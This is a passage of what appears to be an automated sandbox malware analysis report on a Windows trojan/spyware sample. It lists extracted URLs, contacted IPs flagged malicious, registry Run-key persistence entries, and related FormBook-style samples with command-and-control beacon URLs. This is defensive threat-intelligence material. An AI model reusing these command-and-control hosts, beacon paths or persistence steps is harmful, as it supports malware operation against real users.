            http://www.google.it/iexplore.exe, 0000000D.00000003.2086756358.000001BA5D6AD000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175544224.000001BA5D6AE000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeuexplorer.exe, 00000005.00000000.1760442798.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4165873978.0000000007900000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4236083961.000000000CEF5000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4190700229.0000000009A15000.00000004.00000001.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF7Miexplore.exe, 0000001D.00000003.2485695269.0000000009AED000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://www.msn.com/?ocid=iehp;9NKIdiexplore.exe, 0000001D.00000002.4171805100.0000000006327000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKhbhttps://vid.newsweek.com/fani-willis-niexplore.exe, 0000001D.00000002.4186152611.00000000094E0000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://permanently-removed.invalid/v1/issuetokenmsedge.exe, 00000021.00000003.2242770403.00003D540026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000021.00000003.2242302076.00003D5400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000023.00000003.2322511457.00001AA402488000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000023.00000003.2322394725.00001AA402480000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://www.883831.com/gy14/www.mosaica.onlineiexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://permanently-removed.invalid/reauth/v1beta/users/msedge.exe, 00000021.00000003.2242770403.00003D540026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000021.00000003.2242302076.00003D5400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000023.00000003.2322511457.00001AA402488000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000023.00000003.2322394725.00001AA402480000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://permanently-removed.invalid/LogoutYxABmsedge.exe, 00000021.00000003.2242770403.00003D540026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000021.00000003.2242302076.00003D5400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000023.00000003.2322511457.00001AA402488000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000023.00000003.2322394725.00001AA402480000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://search.msn.co.jp/results.aspx?q=%7BsearchTerms%7D&FORM=CBPW#eiexplore.exe, 0000000D.00000002.4167076882.000001BA5D2B0000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://list.taobao.com/browse/search_visual.htm?n=15&q=iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175867415.000001BA5D6D7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086841727.000001BA5D6D4000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://recherche.tf1.fr/favicon.icoQjiexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://www.biosif.comiexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4205290473.000000000A460000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://www.pchome.com.tw/favicon.icoiexplore.exe, 0000000D.00000002.4175410383.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://www.mtdiyx.xyz/gy14/www.169cc.xyzexplorer.exe, 00000005.00000003.3108238253.000000000CBA2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105403139.000000000CB94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4202477697.000000000CBA5000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: phishing
            		unknown
            https://assets.msn.com/staticsb/statics/pr-3693935/IE11NTP/Icon.pngo$iexplore.exe, 0000000E.00000002.4179072726.00000000069D6000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://browser.events.data.msn.com/iexplore.exe, 0000000E.00000002.4190391744.0000000009510000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4177235933.0000000006D60000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://permanently-removed.invalid/RotateBoundCookiesmsedge.exe, 00000021.00000003.2242770403.00003D540026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000021.00000003.2242302076.00003D5400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000023.00000003.2322511457.00001AA402488000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000023.00000003.2322394725.00001AA402480000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://search.yahoo.co.jp/favicon.icoiexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://msn.com/om/niexplore.exe, 0000000E.00000002.4184443900.0000000006AD9000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://www.msn.com/?ocid=iehp.icoaiexplore.exe, 0000000D.00000002.4167657208.000001BA5D4A9000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://www.buflitr.comiexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://www.soso.com/iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://search.cn.yahoo.com/2riexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175867415.000001BA5D6D2000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://code.jquery.com/Aiexplore.exe, 0000001D.00000002.4178783359.0000000006E0B000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://assets.msn.com/staticsb/statics/pr-3693935/IE11NTP/mobile-image.pngGZiexplore.exe, 0000000E.00000002.4160624814.00000000030D7000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://busca.orange.es/iexplore.exe, 0000000D.00000003.2086756358.000001BA5D6AD000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175544224.000001BA5D6AE000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://www.twitter.com/iexplore.exe, 0000000D.00000002.4167657208.000001BA5D3FC000.00000004.00000001.00020000.00000000.sdmp, msapplication.xml6.13.drfalse
            • URL Reputation: safe
            		unknown
            http://www.target.com/iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://www.rd.com/list/tsa-rules-can-cant-pack-in-carry-on/iexplore.exe, 0000001D.00000002.4190700229.0000000009A15000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://search.live.com/results.aspx?q=%7BsearchTerms%7D&src=%7Breferrer:source?%7D&Form=IE8SRCiexplore.exe, 0000000D.00000002.4167076882.000001BA5D273000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://www.kkbox.com.tw/favicon.icoUxiexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175867415.000001BA5D6D7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086841727.000001BA5D6D4000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://code.jquery.com/Qiexplore.exe, 0000000E.00000002.4175868407.000000000642C000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gDjX-dark49tiexplore.exe, 0000001D.00000002.4228571594.000000000B0B5000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://www.camelpmkrf.comexplorer.exe, 00000005.00000003.3108238253.000000000CBA2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105403139.000000000CB94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4202477697.000000000CBA5000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://sb.scorecardresearch.com/b?rn=1716792163636&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fwww.miexplore.exe, 0000000E.00000002.4175868407.00000000063FC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000E.00000002.4190391744.0000000009510000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000E.00000002.4186383756.0000000006B27000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-miexplorer.exe, 00000005.00000000.1760442798.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4165873978.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://assets.msn.com/staticsb/statics/pr-3693935/IE11NTP/Icon.pngiexplore.exe, 0000000E.00000002.4225595480.000000000B858000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000E.00000002.4179072726.00000000069D6000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000E.00000002.4171695825.000000000635E000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000E.00000002.4171695825.0000000006340000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000E.00000002.4210548565.000000000ADEC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4220999092.000000000AB8D000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://c.microsoftstart.com/c.gifiexplore.exe, 0000000E.00000002.4210835737.000000000AE17000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4223084652.000000000AC8C000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://service2.bfast.com/iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://browser.events.data.msn.com/liexplore.exe, 0000000E.00000002.4160624814.00000000030D7000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://www.news.com.au/favicon.icoiexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://www.tiscali.it/favicon.icoiexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://it.search.yahoo.com/iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175867415.000001BA5D6D2000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown

            World Map of Contacted IPs

            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs

            Public IPs

            IPDomainCountryFlagASNASN NameMalicious
            13.107.246.40
            		unknownUnited States
            		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
            38.174.75.236
            		www.aicashu.comUnited States
            		174COGENT-174UStrue
            151.101.130.137
            		code.jquery.comUnited States
            		54113FASTLYUSfalse
            162.159.61.3
            		chrome.cloudflare-dns.comUnited States
            		13335CLOUDFLARENETUSfalse
            142.250.184.225
            		googlehosted.l.googleusercontent.comUnited States
            		15169GOOGLEUSfalse
            172.64.41.3
            		unknownUnited States
            		13335CLOUDFLARENETUSfalse
            66.29.149.193
            		www.mtdiyx.xyzUnited States
            		19538ADVANTAGECOMUStrue
            151.101.1.108
            		prod.appnexus.map.fastly.netUnited States
            		54113FASTLYUSfalse
            23.43.85.133
            		unknownUnited States
            		3257GTT-BACKBONEGTTDEfalse
            142.250.80.74
            		unknownUnited States
            		15169GOOGLEUSfalse
            18.244.18.38
            		sb.scorecardresearch.comUnited States
            		16509AMAZON-02USfalse
            239.255.255.250
            		unknownReserved
            		unknownunknownfalse
            18.143.129.199
            		www.qieqyt.xyzUnited States
            		16509AMAZON-02UStrue
            3.33.130.190
            		venitro.comUnited States
            		8987AMAZONEXPANSIONGBtrue

            General Information

            Joe Sandbox version:40.0.0 Tourmaline
            Analysis ID:1447829
            Start date and time:2024-05-27 08:41:07 +02:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 13m 38s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of analysed new started processes analysed:37
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:1
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Sample name:#U0426#U0438#U0442#U0430#U0442#U0430.exe
            renamed because original name is a hash value
            Original Sample Name:.exe
            Detection:MAL
            Classification:mal100.troj.spyw.expl.evad.winEXE@322/289@33/14
            EGA Information:
            • Successful, ratio: 75%
            HCA Information:
            • Successful, ratio: 57%
            • Number of executed functions: 177
            • Number of non-executed functions: 181
            Cookbook Comments:
            • Found application associated with file extension: .exe
            • Override analysis time to 240000 for current running targets taking high CPU consumption

            Warnings

            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
            • Excluded IPs from analysis (whitelisted): 52.168.117.173, 184.28.89.167, 13.107.42.16, 13.107.21.239, 204.79.197.239, 216.58.212.142, 204.79.197.203, 92.123.104.60, 92.123.104.63, 92.123.104.67, 92.123.104.62, 92.123.104.6, 92.123.104.66, 92.123.104.65, 92.123.104.64, 92.123.104.7, 23.43.62.58, 204.79.197.200, 2.16.164.17, 2.16.164.18, 2.16.164.113, 2.23.209.135, 2.23.209.183, 2.23.209.137, 2.23.209.179, 2.23.209.193, 2.23.209.187, 2.23.209.185, 2.23.209.132, 2.23.209.186, 2.23.209.56, 2.23.209.8, 2.23.209.57, 2.23.209.3, 2.23.209.5, 2.23.209.58, 2.23.209.4, 2.23.209.6, 2.23.209.2, 204.79.197.237, 13.107.21.237, 68.219.88.97, 20.189.173.13, 2.16.164.32, 2.16.164.88, 2.18.64.218, 2.18.64.203, 142.250.176.195, 172.217.165.131, 142.251.40.99, 142.251.40.131
            • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, config.edge.skype.com.trafficmanager.net, slscr.update.microsoft.com, img-s-msn-com.akamaized.net, c-msn-com-nsatc.trafficmanager.net, e11290.dspg.akamaiedge.net, go.microsoft.com, clients2.google.com, e86303.dscx.akamaiedge.net, ocsp.digicert.com, www.bing.com.edgekey.net, login.live.com, config-edge-skype.l-0007.l-msedge.net, th.bing.com, msedge.b.tlu.dl.delivery.mp.microsoft.com, www.gstatic.com, l-0007.l-msedge.net, ieonline.microsoft.com, config.edge.skype.com, e28578.d.akamaiedge.net, www.bing.com, edge-microsoft-com.dual-a-0036.a-msedge.net, assets.msn.com.edgekey.net, fs.microsoft.com, th.bing.com.edgekey.net, c-bing-com.dual-a-0034.a-msedge.net, a-0003.a-msedge.net, ctldl.windowsupdate.com, p-th.bing.com.trafficmanager.net, www-msn-com.a-0003.a-msedge.net, edge.microsoft.com, fe3cr.delivery.mp.microsoft.com, a1834.dscg2.akamai.net, any.edge.bing.com, onedscolprdwus12.westus.cloudapp.azure.com, l-0007.config.sky
            • Execution Graph export aborted for target #U0426#U0438#U0442#U0430#U0442#U0430.exe, PID 7532 because it is empty
            • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
            • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
            • Not all processes where analyzed, report is missing behavior information
            • Report creation exceeded maximum time and may have missing disassembly code information.
            • Report size exceeded maximum capacity and may have missing behavior information.
            • Report size exceeded maximum capacity and may have missing disassembly code.
            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
            • Report size getting too big, too many NtCreateKey calls found.
            • Report size getting too big, too many NtEnumerateKey calls found.
            • Report size getting too big, too many NtOpenFile calls found.
            • Report size getting too big, too many NtOpenKey calls found.
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtProtectVirtualMemory calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
            • Report size getting too big, too many NtSetInformationFile calls found.
            • Report size getting too big, too many NtSetValueKey calls found.
            • Report size getting too big, too many NtWriteVirtualMemory calls found.

            Simulations

            Behavior and APIs

            TimeTypeDescription
            02:42:21API Interceptor1x Sleep call for process: WerFault.exe modified
            02:42:31API Interceptor8698479x Sleep call for process: explorer.exe modified
            02:42:53API Interceptor8235904x Sleep call for process: mstsc.exe modified
            07:42:19AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run N2K8UFW C:\Program Files (x86)\Internet Explorer\iexplore.exe
            07:42:28AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run N2K8UFW C:\Program Files (x86)\Internet Explorer\iexplore.exe
            07:42:46AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run MicrosoftEdgeAutoLaunch_C366A24065C39A1BE76E148DC2D0A868 "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
            07:42:54AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run MicrosoftEdgeAutoLaunch_C366A24065C39A1BE76E148DC2D0A868 "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5

            Joe Sandbox View / Context

            IPs

            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            162.159.61.3SecuriteInfo.com.decompression.bomb.26030.10641.exeGet hashmaliciousUnknownBrowse
              phish_alert_iocp_v1.4.48 (2).emlGet hashmaliciousCaptcha Phish, HTMLPhisherBrowse
                https://microsoftedge.microsoft.com/addons/detail/rocketreach-edge-extensio/ldjlhlheoidifojmfkjfijmdhlagakniGet hashmaliciousUnknownBrowse
                  https://app.frame.io/presentations/52095d75-78f4-40d2-8ecd-505b67097ee1?component_clicked=digest_call_to_action&email_id=1d128434-b5ec-4195-8c8c-860eac345853&email_type=pending-reviewer-inviteGet hashmaliciousUnknownBrowse
                    ZXQ3AcEN5Q.exeGet hashmaliciousUnknownBrowse
                      0af4a52e.0cce76886785b0ff1283f346.workers.devemailantonio.cataneo@axactor.com.msgGet hashmaliciousHTMLPhisherBrowse
                        file.exeGet hashmaliciousFormBookBrowse
                          n6N8r2RjfaGet hashmaliciousUnknownBrowse
                            Setup (1).exeGet hashmaliciousUnknownBrowse
                              LametaSetup.exeGet hashmaliciousUnknownBrowse
                                13.107.246.40Payment Transfer Receipt.shtmlGet hashmaliciousHTMLPhisherBrowse
                                • www.aib.gov.uk/
                                NEW ORDER.xlsGet hashmaliciousUnknownBrowse
                                • 2s.gg/3zs
                                PO_OCF 408.xlsGet hashmaliciousUnknownBrowse
                                • 2s.gg/42Q
                                06836722_218 Aluplast.docx.docGet hashmaliciousUnknownBrowse
                                • 2s.gg/3zk
                                Quotation.xlsGet hashmaliciousUnknownBrowse
                                • 2s.gg/3zM
                                38.174.75.236foWlKxevLl.exeGet hashmaliciousFormBookBrowse
                                • www.aicashu.com/gy14/?s89=ef286dAXYBf&_N=nlOvXhiyDZ62b+EzAnLEDMhV39z3f5HCfGE2961zRYd5Ns2dNpc8yFLhWResPpsR/bO2wibCJA==
                                z16REQUISITODECOTA#U00c7#U00c3Opdf.exeGet hashmaliciousFormBookBrowse
                                • www.aicashu.com/gy14/?kJBt=nlOvXhjGD5/GGOZHcXLEDMhV39z3f5HCfGE2961zRYd5Ns2dNpc8yFLhWSyWMoAq8svn&K8k0=AbsdpdtPmPNTPhn0
                                151.101.130.137http://site9613885.92.webydo.com/?v=1Get hashmaliciousUnknownBrowse
                                • code.jquery.com/jquery-1.7.2.min.js

                                Domains

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                chrome.cloudflare-dns.comboost.exeGet hashmaliciousNovaSentinelBrowse
                                • 172.64.41.3
                                SecuriteInfo.com.decompression.bomb.26030.10641.exeGet hashmaliciousUnknownBrowse
                                • 172.64.41.3
                                SecuriteInfo.com.decompression.bomb.26030.10641.exeGet hashmaliciousUnknownBrowse
                                • 162.159.61.3
                                phish_alert_iocp_v1.4.48 (2).emlGet hashmaliciousCaptcha Phish, HTMLPhisherBrowse
                                • 162.159.61.3
                                https://odisia-broker06.sunnystamp.com/odisia-broker/web/sign?tenantId=401&stepToken=56ec14b036496480e516fd5d9e5c4d0eGet hashmaliciousUnknownBrowse
                                • 172.64.41.3
                                SecuriteInfo.com.Win64.Evo-gen.30302.14698.exeGet hashmaliciousCryptOne, Djvu, GCleaner, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLineBrowse
                                • 162.159.61.3
                                BI6oo9z4In.exeGet hashmaliciousCryptOne, Djvu, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro StealerBrowse
                                • 172.64.41.3
                                https://microsoftedge.microsoft.com/addons/detail/rocketreach-edge-extensio/ldjlhlheoidifojmfkjfijmdhlagakniGet hashmaliciousUnknownBrowse
                                • 162.159.61.3
                                https://drive.google.com/drive/folders/1Zsq5Vi6xg6khSGcx49wWM-Q7O4uJNp0w?usp=sharingGet hashmaliciousUnknownBrowse
                                • 172.64.41.3
                                https://app.frame.io/presentations/52095d75-78f4-40d2-8ecd-505b67097ee1?component_clicked=digest_call_to_action&email_id=1d128434-b5ec-4195-8c8c-860eac345853&email_type=pending-reviewer-inviteGet hashmaliciousUnknownBrowse
                                • 162.159.61.3
                                www.aicashu.comfoWlKxevLl.exeGet hashmaliciousFormBookBrowse
                                • 38.174.75.236
                                z16REQUISITODECOTA#U00c7#U00c3Opdf.exeGet hashmaliciousFormBookBrowse
                                • 38.174.75.236
                                BANCO_SWIFT_pdf.exeGet hashmaliciousFormBookBrowse
                                • 38.174.142.66
                                z16BOLETOBANC#U00c1RIO.exeGet hashmaliciousFormBookBrowse
                                • 38.174.142.66
                                22#U042b.exeGet hashmaliciousFormBookBrowse
                                • 38.174.142.66
                                code.jquery.comhttps://verify-signinoutlexchangeadmin.com/MBill@microsoft.comGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                • 151.101.2.137
                                https://brownpluss.com/Get hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                • 151.101.66.137
                                Remittance#26856.htmlGet hashmaliciousHTMLPhisherBrowse
                                • 151.101.130.137
                                http://y6ss1.shop/Get hashmaliciousUnknownBrowse
                                • 151.101.130.137
                                https://pub-dde186d3ef204edd89e847d256cdf5bd.r2.dev/ghupl.htmlGet hashmaliciousUnknownBrowse
                                • 151.101.130.137
                                https://topicbiker.yachts/Get hashmaliciousHTMLPhisherBrowse
                                • 151.101.2.137
                                https://etsxt.shop/Get hashmaliciousUnknownBrowse
                                • 151.101.130.137
                                https://biogenicalatam.com/Get hashmaliciousUnknownBrowse
                                • 151.101.194.137
                                https://uch.mrn.mybluehost.me/MS/DHLM/Get hashmaliciousHTMLPhisherBrowse
                                • 151.101.2.137
                                https://lucah141.my-telegram.my.id/Get hashmaliciousUnknownBrowse
                                • 151.101.130.137
                                www.qieqyt.xyzPedido de compra urgente.exeGet hashmaliciousFormBookBrowse
                                • 18.143.129.199
                                P9NB4NSVEz.exeGet hashmaliciousFormBookBrowse
                                • 18.143.129.199
                                z16REQUISITODECOTA#U00c7#U00c3Opdf.exeGet hashmaliciousFormBookBrowse
                                • 18.143.129.199
                                SecuriteInfo.com.Win32.RATX-gen.15227.23442.exeGet hashmaliciousFormBookBrowse
                                • 18.143.129.199
                                FzmV6WMP63.exeGet hashmaliciousFormBookBrowse
                                • 18.143.129.199
                                z17PEDIDODEOR_AMENTOpdf.exeGet hashmaliciousFormBookBrowse
                                • 18.143.129.199
                                18#U041a.exeGet hashmaliciousFormBookBrowse
                                • 18.143.129.199
                                z1CUNGC___PTH____NGM___I.exeGet hashmaliciousFormBookBrowse
                                • 18.143.129.199
                                SKMBT_C9020112023_PDF.exeGet hashmaliciousFormBookBrowse
                                • 18.143.129.199
                                #U00d6DEME_MAKBUZU.exeGet hashmaliciousFormBookBrowse
                                • 18.143.129.199

                                ASNs

